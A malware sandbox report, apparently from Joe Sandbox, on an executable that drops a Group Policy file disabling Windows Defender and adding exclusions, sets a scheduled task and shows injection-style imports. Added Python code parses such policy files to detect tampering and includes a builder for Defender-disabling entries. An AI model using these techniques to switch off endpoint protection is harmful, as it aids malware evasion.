                                                                                                                                                                                                                                Entropy (8bit):3.4879173014280123
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:CBA9E747810E6F20E6F25B419EFE2B42
                                                                                                                                                                                                                                SHA1:B0F6457F3D1EAC06BFE7B9D8725E6AE6D9178DC6
                                                                                                                                                                                                                                SHA-256:8C9DEDB9A9E0727FBA7E3D619AFEB964536884DA722D3BDB8C1D8E46EE9A508B
                                                                                                                                                                                                                                SHA-512:0657881A21435B09E0DC4A2F4191FE99908675A4BFA6F7B11E7427BADF77E971389A0342992595E12EB4DAC518C2201E586C474C6E9A2089035B5744F6B9290E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.
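Added example, not part of the Joe Sandbox report or of the sample: libmagic labels the dropped file above "RAGE Package Format", but a PReg header followed by [key;value;type;size;data] records in UTF-16LE is the Group Policy Registry.pol format, which is the mechanism behind the report's "Modifies Group Policy settings" and "Disable Windows Defender real time protection" signatures. The parser below reads that format and flags entries that switch Defender off or add exclusions. The sample entries are constructed from the key and value names visible in the preview; their data (DWORD 1, REG_SZ "0" for the exe exclusion), the DisableRealtimeMonitoring entry (the preview is cut off inside Real-Time Protection) and the benign WindowsUpdate entry are assumptions made for the example.

```python
import struct

REG_SZ = 1
REG_DWORD = 4
WD = r"SOFTWARE\Policies\Microsoft\Windows Defender"

# Value names under the Defender policy tree that turn protection off when set to 1.
DISABLE_FLAGS = {
    "disableantispyware", "disableroutinelytakingaction", "disablebehaviormonitoring",
    "disablerealtimemonitoring", "disableonaccessprotection", "disableioavprotection",
    "disablescanonrealtimeenable",
}


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


def dword(n: int) -> bytes:
    return struct.pack("<I", n)


def sz(s: str) -> bytes:
    """REG_SZ payload: UTF-16LE text plus its terminating NUL."""
    return _u16(s) + b"\x00\x00"


# Constructed sample: names taken from the dropped Registry.pol preview; the data values,
# the DisableRealtimeMonitoring entry and the WindowsUpdate entry are assumptions.
SAMPLE_ENTRIES = [
    (WD, "DisableAntiSpyware", REG_DWORD, dword(1)),
    (WD, "DisableRoutinelyTakingAction", REG_DWORD, dword(1)),
    (WD + r"\Exclusions", "Exclusions_Extensions", REG_DWORD, dword(1)),
    (WD + r"\Exclusions\Extensions", "exe", REG_SZ, sz("0")),
    (WD + r"\Real-Time Protection", "DisableBehaviorMonitoring", REG_DWORD, dword(1)),
    (WD + r"\Real-Time Protection", "DisableRealtimeMonitoring", REG_DWORD, dword(1)),
    (r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU", "NoAutoUpdate", REG_DWORD, dword(0)),
]


def build_preg(entries) -> bytes:
    """Serialise entries as PReg v1: 'PReg' + DWORD 1, then [key;value;type;size;data] per entry,
    with '[', ';' and ']' stored as UTF-16LE characters and the strings NUL-terminated."""
    out = bytearray(b"PReg" + dword(1))
    for key, value, rtype, data in entries:
        out += (_u16("[") + sz(key) + _u16(";") + sz(value) + _u16(";") + dword(rtype)
                + _u16(";") + dword(len(data)) + _u16(";") + data + _u16("]"))
    return bytes(out)


def _read_sz(buf: bytes, pos: int):
    """Read a NUL-terminated UTF-16LE string at pos; return (text, offset after the terminator)."""
    end = pos
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(buf):
            raise ValueError("unterminated string")
    return buf[pos:end].decode("utf-16-le"), end + 2


def _expect(buf: bytes, pos: int, ch: str) -> int:
    if buf[pos:pos + 2] != _u16(ch):
        raise ValueError(f"expected {ch!r} at offset {pos}")
    return pos + 2


def _decode(rtype: int, data: bytes):
    if rtype == REG_DWORD and len(data) == 4:
        return struct.unpack("<I", data)[0]
    if rtype == REG_SZ:
        return data.decode("utf-16-le").rstrip("\x00")
    return data.hex()


def parse_preg(buf: bytes):
    """Parse a Registry.pol blob into (key, value_name, type, decoded_data) tuples."""
    if buf[:4] != b"PReg" or struct.unpack_from("<I", buf, 4)[0] != 1:
        raise ValueError("not a PReg version 1 file")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _read_sz(buf, pos)
        pos = _expect(buf, pos, ";")
        value, pos = _read_sz(buf, pos)
        pos = _expect(buf, pos, ";")
        rtype = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        data = buf[pos:pos + size]
        pos = _expect(buf, pos + size, "]")
        entries.append((key, value, rtype, _decode(rtype, data)))
    return entries


def defender_tampering(entries):
    """Findings for entries that disable a Defender component or add an exclusion."""
    findings = []
    for key, value, rtype, data in entries:
        k = key.lower()
        if not k.startswith(WD.lower()):
            continue
        if "\\exclusions" in k:
            findings.append(f"exclusion: {key}\\{value} = {data!r}")
        elif value.lower() in DISABLE_FLAGS and data == 1:
            findings.append(f"protection disabled: {key}\\{value} = 1")
    return findings


if __name__ == "__main__":
    for line in defender_tampering(parse_preg(build_preg(SAMPLE_ENTRIES))):
        print(line)
```

On a live host the same parser runs over C:\Windows\System32\GroupPolicy\Machine\Registry.pol; the gpt.ini dropped next to this file (see the following record) carries the Version counter that, once changed, makes the client reprocess the policy, so a Registry.pol and gpt.ini written by an unexpected process is itself the detection opportunity.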
Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
File Type:ASCII text
Category:dropped
Size (bytes):268
Entropy (8bit):4.9507895998010145
Encrypted:false
SSDEEP:
MD5:A62CE44A33F1C05FC2D340EA0CA118A4
SHA1:1F03EB4716015528F3DE7F7674532C1345B2717D
SHA-256:9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
SHA-512:9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
Malicious:true
Reputation:unknown
Preview:[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.
Process:C:\Windows\SysWOW64\schtasks.exe
File Type:data
Category:dropped
Size (bytes):522
Entropy (8bit):3.6884715835901827
Encrypted:false
SSDEEP:
MD5:58990C47685205572DE016B73FBAC5D5
SHA1:BF73959BF911C39DDD73D05AA6D015E9408E356C
SHA-256:630D6AB651E97A417675A36B795F2D87C5F87FCD7CE9EA7420118540010F6C15
SHA-512:29D5A315BEE86E9963AC760806ECDA11DE1D920C6EE80E47A4A7327D36A6AC424D1739C3E72FD2AC00DA53D7B9008FB6207F8CF150354E8176842EDAA23D4FAF
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                Preview:......J[I.....v..F.......<... .....s...............................P.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.J.M.P.Z.e.W.v.H.h.A.r.m.q.R.O.v.Y.\.N.w.f.P.J.C.C.p.Q.q.P.Y.D.z.K.\.k.o.E.M.G.M.U...e.x.e.....e.m. ./.V.N.s.i.t.e._.i.d.n.L.d. .3.8.5.1.1.8. ./.S...D.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.J.M.P.Z.e.W.v.H.h.A.r.m.q.R.O.v.Y.\.N.w.f.P.J.C.C.p.Q.q.P.Y.D.z.K.....T.O.T.T.I.-.P.C.\.t.o.t.t.i...................0.................&.............................
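Added example, not from the report: the data file schtasks.exe wrote above is mostly UTF-16LE text, namely the task's executable path under C:\Users\totti\AppData\Local\Temp\..., its arguments and the account TOTTI-PC\totti. The report normalises paths elsewhere to C:\Users\user\..., so the blob is where the real sandbox account name survives, which is worth remembering when comparing strings from dropped files with the report's own paths. The carver below, the equivalent of strings -el, recovers such wide strings from any binary blob; the sample blob is constructed from the strings shown in the preview with a made-up header and plain NUL separators, not the real 522-byte file.

```python
import string

# Characters accepted inside a wide string: printable ASCII, as `strings` would take them.
PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " ")


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


# Constructed sample blob: an invented header, then the strings visible in the preview of
# the schtasks.exe drop, each NUL-terminated. Not the real file.
SAMPLE_BLOB = (
    b"\x01\x00\x00\x00" + b"\x4a\x5b\x49" + b"\x00" * 5
    + _u16(r"C:\Users\totti\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe") + b"\x00\x00"
    + _u16("em /VNsite_idnLd 385118 /S") + b"\x00\x00"
    + _u16(r"C:\Users\totti\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK") + b"\x00\x00"
    + _u16(r"TOTTI-PC\totti") + b"\x00\x00"
    + b"\x00" * 8
)


def extract_utf16le_strings(buf: bytes, min_len: int = 6):
    """Carve runs of printable UTF-16LE text of at least min_len characters.
    Both byte alignments are scanned, since a string may start at an odd offset.
    Returns (offset, text) pairs sorted by offset."""
    found = []
    for align in (0, 1):
        run, start = [], None
        for i in range(align, len(buf) - 1, 2):
            lo, hi = buf[i], buf[i + 1]
            if hi == 0 and chr(lo) in PRINTABLE:
                if not run:
                    start = i
                run.append(chr(lo))
            else:
                if len(run) >= min_len:
                    found.append((start, "".join(run)))
                run = []
        if len(run) >= min_len:          # string running to the end of the buffer
            found.append((start, "".join(run)))
    found.sort()
    return found


def task_command_line(buf: bytes):
    """Heuristic for this blob layout: the first carved string is the image path and the
    second its arguments (an assumption about the layout, not a documented format)."""
    texts = [t for _, t in extract_utf16le_strings(buf)]
    return (texts[0], texts[1]) if len(texts) >= 2 else (None, None)


if __name__ == "__main__":
    for off, text in extract_utf16le_strings(SAMPLE_BLOB):
        print(f"{off:#06x}: {text}")
```

The alignment loop matters on real task cache data, where length-prefixed fields shift strings to odd offsets; a single-alignment scan silently drops every other string.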
Process:C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):7157248
Entropy (8bit):7.756166190918081
Encrypted:false
SSDEEP:
MD5:E77964E011D8880EAE95422769249CA4
SHA1:8E15D7C4B7812A1DA6C91738C7178ADF0FF3200F
SHA-256:F200984380D291051FC4B342641CD34E7560CADF4AF41B2E02B8778F14418F50
SHA-512:8FEB3DC4432EC0A87416CBC75110D59EFAF6504B4DE43090FC90286BD37F98FC0A5FB12878BB33AC2F6CD83252E8DFD67DD96871B4A224199C1F595D33D4CADE
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R.......l.......m......zF...........b.h....b.l.....b.S....Rich...................PE..L......a..........................................@..........................P......m.m...@..........................................@...........................A.................................. .l.@............................................text...=........................... ..`.data............B`.................@....idata................l.............@..@.debug................l.............@....reloc...A.......B....l.............@..B.rsrc........@.......,m.............@..@........................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1835008
Entropy (8bit):4.298435360966713
Encrypted:false
SSDEEP:
MD5:1F69DF399D44559386649E2BAA7D570C
SHA1:C2F170827897CBDD2FC6CC264A6866BF5C381B58
SHA-256:64565B9C477FBEC9A7F5B9CA43392CF195348AAFE8E92D3A490D64772B464F04
SHA-512:337BA9D984C6417979A75D5402F55B04BCF8082A08E5AC05C87B47AAE6CCA5A517A37BC5A2B9421F4E78A746D6BC1A5AEDBEC59ABDED14FA16202ED5A4A97BC9
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"fN.................................................................................................................................................................................................................................................................................................................................................1.[.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):80
Entropy (8bit):4.837326145256008
Encrypted:false
SSDEEP:
MD5:C1028F4DC91171021CC811DEC5CBD173
SHA1:72358DE1D13924E08B33CE14A9D1E0BB0E04DFB1
SHA-256:8D4075306F058EFA27EBCCDA57983F28F196141049701D07E044B7EA17F21B12
SHA-512:72DC710CB1DE2D86121A7FAF4FE93D64B8A0FB9C9C7848A7A1ACA9BC429040CA8565C48861F53107A9709AAB2235DF6953AEF9282F382BE960344CD1E08735A9
Malicious:false
Reputation:unknown
Preview:Executing (MSFT_MpPreference)->Add()...ERROR:...Description = Generic failure...
File type:PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):6.590225151018962
TrID:
• Win64 Executable Console Net Framework (206006/5) 48.58%
• Win64 Executable Console (202006/5) 47.64%
• Win64 Executable (generic) (12005/4) 2.83%
• Generic Win/DOS Executable (2004/3) 0.47%
• DOS Executable Generic (2002/1) 0.47%
File name:file.exe
File size:3'428'696 bytes
MD5:b9882fe8bb7ab2a4d094f9ff5442df1c
SHA1:e17c146530a4371e0595c195c24863935a3dee8b
SHA256:4f47d84b03f5cfa3845d1b36df5e40df984756fc6ba2d98586eb39dced212628
SHA512:bee33d43deb43854975e6c7a57f27ab8c6519ea3e6df51297ca670ac62831f29f6a18eff0bb0af14f9e985ebf9e2169ed97582fa64998cfb33b1d8b61ec72db4
SSDEEP:49152:zUIbNigeVE2MD7ZDAgUf0dgF8bEOlf84L:JI3bg3J
TLSH:BCF59E0AE3E805D5E16BD630CA29DB32D671B89A0731D74F1927D3462F73A924F7B221
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..,=...=...=...;4.~1...;4.~,...;4.~....4.e.3...v..~6...=...)...W4.~6...W4.~x...=...?...W4.~<...W4..<...W4.~<...Rich=..........
                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                Entrypoint:0x14006aab0
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x6621B49D [Fri Apr 19 00:02:37 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:0x4006aac4, 0x1
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:d4e6049ebe9b9b358b43e39f88c5de46
                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                • 21/04/2024 07:05:59 21/04/2025 07:05:59
                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                Thumbprint MD5:D79A1FE7829C9CADAC5773537D9EBCA0
                                                                                                                                                                                                                                Thumbprint SHA-1:41B5175C2B9B429F25D8DA75B51C90C3BE9135BF
                                                                                                                                                                                                                                Thumbprint SHA-256:B920FA724FBCCAD63CA5D526F78D138F32120EE69AC714501D6B59B3E51B4DA8
                                                                                                                                                                                                                                Serial:00A1EC43858F589F40A83F61021DBA57FD
Instruction
dec eax
sub esp, 28h
call 00007F57493603CCh
dec eax
add esp, 28h
jmp 00007F574935FB77h
int3
int3
cmp edx, 02h
jne 00007F574935FD62h
dec eax
mov dword ptr [esp+08h], ebx
push edi
dec eax
sub esp, 20h
mov ecx, dword ptr [002B89F7h]
dec eax
mov eax, dword ptr [00000058h]
inc ecx
mov eax, 00000100h
dec eax
mov edx, dword ptr [eax+ecx*8]
inc edx
cmp byte ptr [edx+eax], 00000001h
je 00007F574935FD2Eh
inc edx
mov byte ptr [edx+eax], 00000001h
dec eax
lea ebx, dword ptr [00157DF9h]
dec eax
lea edi, dword ptr [00157DF2h]
jmp 00007F574935FD14h
dec eax
mov eax, dword ptr [ebx]
dec eax
test eax, eax
je 00007F574935FD08h
call dword ptr [00157D1Ah]
dec eax
add ebx, 08h
dec eax
cmp ebx, edi
jne 00007F574935FCEBh
dec eax
mov ebx, dword ptr [esp+30h]
dec eax
add esp, 20h
pop edi
ret
int3
int3
inc ebp
xor eax, eax
xor ecx, ecx
inc ecx
lea edx, dword ptr [eax+02h]
jmp 00007F574935FC8Fh
int3
int3
jmp 00007F57493606D0h
int3
int3
int3
dec eax
sub esp, 28h
call 00007F574935FDC8h
jmp 00007F574935FD04h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F574935FCECh
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F574935FD12h
mov eax, 00000001h
                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2efd20 | 0x58 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2efd78 | 0xf0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x342000 | 0xa2c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x324000 | 0x1c758 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x343878 | 0x18e0 | .reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x343000 | 0x10400 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2a2f60 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x2a3100 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2a2e20 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1c2000 | 0x820 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x74668 | 0x74800 | 0c190e97c93d543a6fcb516020aa4716 | False | 0.4500842442328326 | data | 6.62793721677797 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed | 0x76000 | 0x14bc88 | 0x14be00 | 1342a2d7314a722bd15b5a7d885cafe0 | False | 0.4593463100282486 | data | 6.443735456874621 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1c2000 | 0x12fab6 | 0x12fc00 | 9d6a5c3e15519d0105a4874ec954c8fd | False | 0.40036731610082305 | data | 6.010446384557858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2f2000 | 0x31c38 | 0x22e00 | 144561dc644a6516434ab34501b88cbf | False | 0.21279261872759855 | data | 3.656162662924527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x324000 | 0x1c758 | 0x1c800 | c05234c0e72312cacecd6446e573b413 | False | 0.4897889254385965 | SysEx File - Roland | 6.278035079670816 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x341000 | 0x1f4 | 0x200 | a361a21b18210af539022cc7692d7b69 | False | 0.53515625 | data | 4.225357642778286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x342000 | 0xa2c | 0xc00 | 6a7cdc2cae875370a6ddc97710aea48e | False | 0.2724609375 | data | 4.4731114607795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x343000 | 0x10400 | 0x10400 | e2f689150cd4320f95e78e99ef11167c | False | 0.2231971153846154 | data | 5.452014151474419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3420b8 | 0x3c4 | data | | | 0.5051867219917012
RT_VERSION | 0x34247c | 0x3c4 | data | English | United States | 0.5072614107883817
RT_MANIFEST | 0x342840 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegEnumKeyExW, RegEnumValueW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, GetTokenInformation, DuplicateTokenEx, OpenThreadToken, RevertToSelf, ImpersonateLoggedOnUser, CheckTokenMembership, EventWrite, EventRegister, EventEnabled
bcrypt.dll | BCryptDestroyKey, BCryptOpenAlgorithmProvider, BCryptDecrypt, BCryptGenerateSymmetricKey, BCryptCloseAlgorithmProvider, BCryptGenRandom
KERNEL32.dll | TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, SetLastError, FormatMessageW, GetLastError, FreeConsole, AllocConsole, GetConsoleWindow, LocalFree, VirtualAllocEx, ResumeThread, CreateProcessW, GetThreadContext, SetThreadContext, WriteProcessMemory, ExitProcess, CloseThreadpoolIo, SetThreadErrorMode, GetModuleFileNameW, MultiByteToWideChar, GetStdHandle, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LoadLibraryExW, FileTimeToSystemTime, GetSystemTime, GetCalendarInfoEx, GetLocaleInfoEx, EnumCalendarInfoExEx, LCMapStringEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, LocaleNameToLCID, ResolveLocaleName, GetUserPreferredUILanguages, FindStringOrdinal, GetTickCount64, GetCurrentProcessorNumber, GetCurrentProcess, GetCurrentThread, WaitForSingleObject, Sleep, CreateThreadpoolWork, CloseThreadpoolWork, SubmitThreadpoolWork, CreateThreadpoolWait, SetThreadpoolWait, WaitForThreadpoolWaitCallbacks, CloseThreadpoolWait, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, WaitForMultipleObjectsEx, GetFileAttributesExW, GetFullPathNameW, GetLongPathNameW, LocalAlloc, GetConsoleOutputCP, WideCharToMultiByte, WriteFile, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, EnumTimeFormatsEx, CopyFileExW, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetCurrentDirectoryW, GetFileInformationByHandleEx, GetFileType, GetOverlappedResult, GetSystemDirectoryW, ReadFile, SetFileInformationByHandle, SetFilePointerEx, CreateThread, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetDynamicTimeZoneInformation, GetTimeZoneInformation, CloseHandle, SetEvent, CreateEventExW, GetEnvironmentVariableW, GetExitCodeProcess, TerminateProcess, OpenProcess, GetProcessId, QueryFullProcessImageNameW, CreatePipe, GetCPInfoExW, GetConsoleCP, K32EnumProcesses, FlushProcessWriteBuffers, GetCurrentThreadId, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObjectEx, VirtualQuery, RtlCaptureContext, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, SuspendThread, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, ResetEvent, DebugBreak, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetTickCount, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, GetWriteWatch, ResetWriteWatch, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, InitializeSListHead, GetCurrentProcessId, SleepConditionVariableSRW, WakeAllConditionVariable, AcquireSRWLockExclusive, ReleaseSRWLockExclusive
ole32.dll | CoTaskMemAlloc, CoUninitialize, CoInitializeEx, CoTaskMemFree, CoGetApartmentType, CoWaitForMultipleHandles, CoCreateGuid
USER32.dll | LoadStringW
api-ms-win-crt-heap-l1-1-0.dll | free, malloc, _set_new_mode, calloc, _callnewh
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr, sin, modf, tan, ceil, cos, pow, floor
api-ms-win-crt-string-l1-1-0.dll | strncpy_s, _stricmp, strcpy_s, _wcsicmp, strcmp, wcsncmp
api-ms-win-crt-runtime-l1-1-0.dll | exit, _exit, _initterm, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initterm_e, _get_initial_wide_environment, _initialize_wide_environment, abort, __p___argc, _register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___wargv, _seh_filter_exe, _set_app_type, _configure_wide_argv
api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf_s, _set_fmode, __stdio_common_vsscanf, __p__commode, __stdio_common_vfprintf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Name | Ordinal | Address
DotNetRuntimeDebugHeader | 1 | 0x1403140f0
Language of compilation system | Country where language is spoken | Map
English | United States |
Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.
Target ID: 0
Start time: 21:37:07
Start date: 23/04/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x7ff6385c0000
